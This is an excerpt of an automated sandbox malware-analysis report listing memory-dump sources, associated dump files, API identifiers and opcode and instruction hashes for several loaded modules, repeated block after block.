    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 3d58607ea008f735c35aa192c444d383010a86a802efbfec2a893f784aca3acb
    • Instruction ID: 99776bdef0d871cef21211c06c36697b30e2c96492a400ad39d91e6d6d963dd9
    • Opcode Fuzzy Hash: 3d58607ea008f735c35aa192c444d383010a86a802efbfec2a893f784aca3acb
    • Instruction Fuzzy Hash: 50F0FC12708B069AE5528F01B8403B92145AF547B5F4403B5ED2D666B0EF2DD9C58308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 864bd6950e4dc7ead035f6458e2f111194ad25b06bbe2de8fa939e0b9dfb6e44
    • Instruction ID: 65d940cc52556dab5a0b6f0611ea7c6d86dbf246d669f7bde499e44518b53cd3
    • Opcode Fuzzy Hash: 864bd6950e4dc7ead035f6458e2f111194ad25b06bbe2de8fa939e0b9dfb6e44
    • Instruction Fuzzy Hash: AFF0FC12608A069AE5528F01FC403B92145BF547B5F4403B5ED2D666F0DF2DD9C98308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 1c1351330875f9c8bd18c082cd93de86cb5c94d83726f94722587cab582a8534
    • Instruction ID: c6980549455a908081297a7fc02616f18d95ee92463df668b6a516ec5bd1331b
    • Opcode Fuzzy Hash: 1c1351330875f9c8bd18c082cd93de86cb5c94d83726f94722587cab582a8534
    • Instruction Fuzzy Hash: 6DF09662A0874A42E5528F10B8403BD7255FF45795F480237DDBD4A7B0EF2DD9899304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 6d608df275b056a3b713e4e628b86266d21e47831cf3fbb35a0fadee4a8b9b3e
    • Instruction ID: 3d1ed679577efd7ca5488f16f67e07d3b3000cf0105f9276ec215b1b5381160f
    • Opcode Fuzzy Hash: 6d608df275b056a3b713e4e628b86266d21e47831cf3fbb35a0fadee4a8b9b3e
    • Instruction Fuzzy Hash: D6F09662A0874A42E5528F10B8403BD7255FF45795F480237DDBD8A7B0EF2DD9899304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 26a5f34eba60c4f72c8ee3af2f195e4e81c90cd8bb8772d263f182db54f5d605
    • Instruction ID: 6e458d4b588b0bab55ddf354ae1d9277f2075ec22fda83a10abef91f04d62618
    • Opcode Fuzzy Hash: 26a5f34eba60c4f72c8ee3af2f195e4e81c90cd8bb8772d263f182db54f5d605
    • Instruction Fuzzy Hash: 03F09662A0874A42E5528F20B8403BD7295FF44795F484237DDFD4A7B0EF2DD9899304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 84c111626073ce5c6c6a488b718616bccb97df3eac41e212bff6ccc94375b7de
    • Instruction ID: 4483d6ca70fa4a04af45bcb4145253897da95d75dad3b00e15abc9181736ccbd
    • Opcode Fuzzy Hash: 84c111626073ce5c6c6a488b718616bccb97df3eac41e212bff6ccc94375b7de
    • Instruction Fuzzy Hash: 43F09662A0874A42E5528F10B8403BD7255FF45795F480237DDBD4A6B0EF2DD9899304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 66da268986e4be30b64b14f8924397359769a65e1e775faed6dc0f2b83886bee
    • Instruction ID: 96b24bec71afd87332564ba199949cea2a50fe58fea6cb5ddd0816f0975fa41e
    • Opcode Fuzzy Hash: 66da268986e4be30b64b14f8924397359769a65e1e775faed6dc0f2b83886bee
    • Instruction Fuzzy Hash: 41F09662A0874A46E5528F10B8403BD7255FF45795F480237DDBD4A7B1EF2DD9899304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 7c4659f02fd35fdcd3290138beeb929024684a99d8d553bee1ea4cda34c7a78e
    • Instruction ID: 698912519ab9914a966a5bacf9c454f9020624596d0520932c4748a26cfad4a6
    • Opcode Fuzzy Hash: 7c4659f02fd35fdcd3290138beeb929024684a99d8d553bee1ea4cda34c7a78e
    • Instruction Fuzzy Hash: 6CF0F663A09A4E47EA52AF02BC407B96254AF807B4F480176ED8D466F0DFADD9858300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 51c307131b55aec3c0749a358073cda3b0a5530b3f81b11b4ae0d31ed059fcf9
    • Instruction ID: b367c8ffffc53270d71765b73de101f1f9e1099e413af286a98707b20ef0cf41
    • Opcode Fuzzy Hash: 51c307131b55aec3c0749a358073cda3b0a5530b3f81b11b4ae0d31ed059fcf9
    • Instruction Fuzzy Hash: EEF0F663A09A4E46EA53AF02BC407B92254EF807B4F480176ED8D466F0DFADD9858300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 5d0b49dd086e279bc77500168be92721f92f0f72b19a251bde8d8a8182f60467
    • Instruction ID: 828b369ede411adebf4db7c612642eb5ff342f47b7d05a01018c159a61824c6b
    • Opcode Fuzzy Hash: 5d0b49dd086e279bc77500168be92721f92f0f72b19a251bde8d8a8182f60467
    • Instruction Fuzzy Hash: D9F0F063A09B4E46EA52EF02BC407B92254BF807B4F080276ED8D466F0DFADD9899300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 0242a6b0b5dd8d2e5d63b5b2d5db992aa3b72a2ac295f431f0aebe6400e05e67
    • Instruction ID: c1552fd0db36ab6e5fbed404b25998277ddf47bf1fc5f2aa6b6f09775f6b80d9
    • Opcode Fuzzy Hash: 0242a6b0b5dd8d2e5d63b5b2d5db992aa3b72a2ac295f431f0aebe6400e05e67
    • Instruction Fuzzy Hash: 62F0F663A09A4E46EA52AF02BC407B92254BF807B4F480175ED8C466F0DFADD9898300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 5233c264fc2f2bbf7ba5f9c52177b672e28e13a3e982c5a1ed757ebf16e6991f
    • Instruction ID: 1ed349cd691719057617495864a0494510755f1303c3c062ad88543e2ed58084
    • Opcode Fuzzy Hash: 5233c264fc2f2bbf7ba5f9c52177b672e28e13a3e982c5a1ed757ebf16e6991f
    • Instruction Fuzzy Hash: 97F0F663A09B4E46EA52AF02BC407B92254AF807B4F480275ED8D466F0DFADD9858300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: c00b75a7403bee72996b81dcde6a1367c4d79da2f84ef6df1ea375842985482d
    • Instruction ID: 3566868fdc48d8adcc1d09fac5047a690f53ba1c26659997d7dd0a1c1856e6ac
    • Opcode Fuzzy Hash: c00b75a7403bee72996b81dcde6a1367c4d79da2f84ef6df1ea375842985482d
    • Instruction Fuzzy Hash: 85F06812A08B4A81EB518B55BC403776259AF407F5F880276ED5D466E0DF2DE9859700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 9d60ba447d042ec848a1f0df881a030ea040afa3a163862d9c91c3f06c18c160
    • Instruction ID: a054203628caeab70b6e4fef1c5dd188a48e56c02506f9b60f7ce92c47dfc389
    • Opcode Fuzzy Hash: 9d60ba447d042ec848a1f0df881a030ea040afa3a163862d9c91c3f06c18c160
    • Instruction Fuzzy Hash: 6FF09C12A08F4A81EB518F95BC40377625DAF407F5F880176ED5D466F0DF3DE9859700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 1ca47401105242848917e5a52f00ad11a24243aae0c42a765783fbadcb057b7a
    • Instruction ID: 1f48aea625393b9945e5dd8b35127b14aa1f9efd3c7f551bca01b5a48a50ee39
    • Opcode Fuzzy Hash: 1ca47401105242848917e5a52f00ad11a24243aae0c42a765783fbadcb057b7a
    • Instruction Fuzzy Hash: B5F06812A08A4A81EB528B55BC40377625DAF407F5F880176ED5D466E0DF2DE9859701
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 89b9038340141949f295c490203b943d68a61e77292b733f7e48406514dfa9d0
    • Instruction ID: c760273cca7ab89aa598f4c0d9b579a374914b6b43276af1afe65471075c6747
    • Opcode Fuzzy Hash: 89b9038340141949f295c490203b943d68a61e77292b733f7e48406514dfa9d0
    • Instruction Fuzzy Hash: A9F09C12A08E4A81EB518F55BC40377625DAF407F5F880176ED5D466F0DF3DE9859700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: b4c10f4c4197543128014ea051902a9567a4cf1b2e41f87356710183bfe74d50
    • Instruction ID: b73a95eabda493f0d725520e23ee85373c8bc901e0cb2f9c5c3bb14b95321eb2
    • Opcode Fuzzy Hash: b4c10f4c4197543128014ea051902a9567a4cf1b2e41f87356710183bfe74d50
    • Instruction Fuzzy Hash: 7EF09C12A08F4A85EB518F55BC40377625DAF407F5F880276ED5D466F0EF3DE9859700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: aee25f3375b6f68116ef9376df48ad51217fa5514f59397816fd319ffba5dc5c
    • Instruction ID: 26de1c27435dac81288e767afc3511a529543e7488f820fe7d89f54e5ba8b11e
    • Opcode Fuzzy Hash: aee25f3375b6f68116ef9376df48ad51217fa5514f59397816fd319ffba5dc5c
    • Instruction Fuzzy Hash: 76F0966260874B46E5529F00BD443B96255AF41795F480237DDED466B2EF3DD985D300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: f1bc13f0dd94f3d455efcdcc6a1c46014af35c3bba47818547b55d9d4357c4a1
    • Instruction ID: 42d3dad4f9e61b238ff10fbd4220ab534c428ac5c6143c1474371abcb42a91db
    • Opcode Fuzzy Hash: f1bc13f0dd94f3d455efcdcc6a1c46014af35c3bba47818547b55d9d4357c4a1
    • Instruction Fuzzy Hash: 29F0966260864742E5529F00FD443B96255BF41795F480237DDED466F1EF3DD989D300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
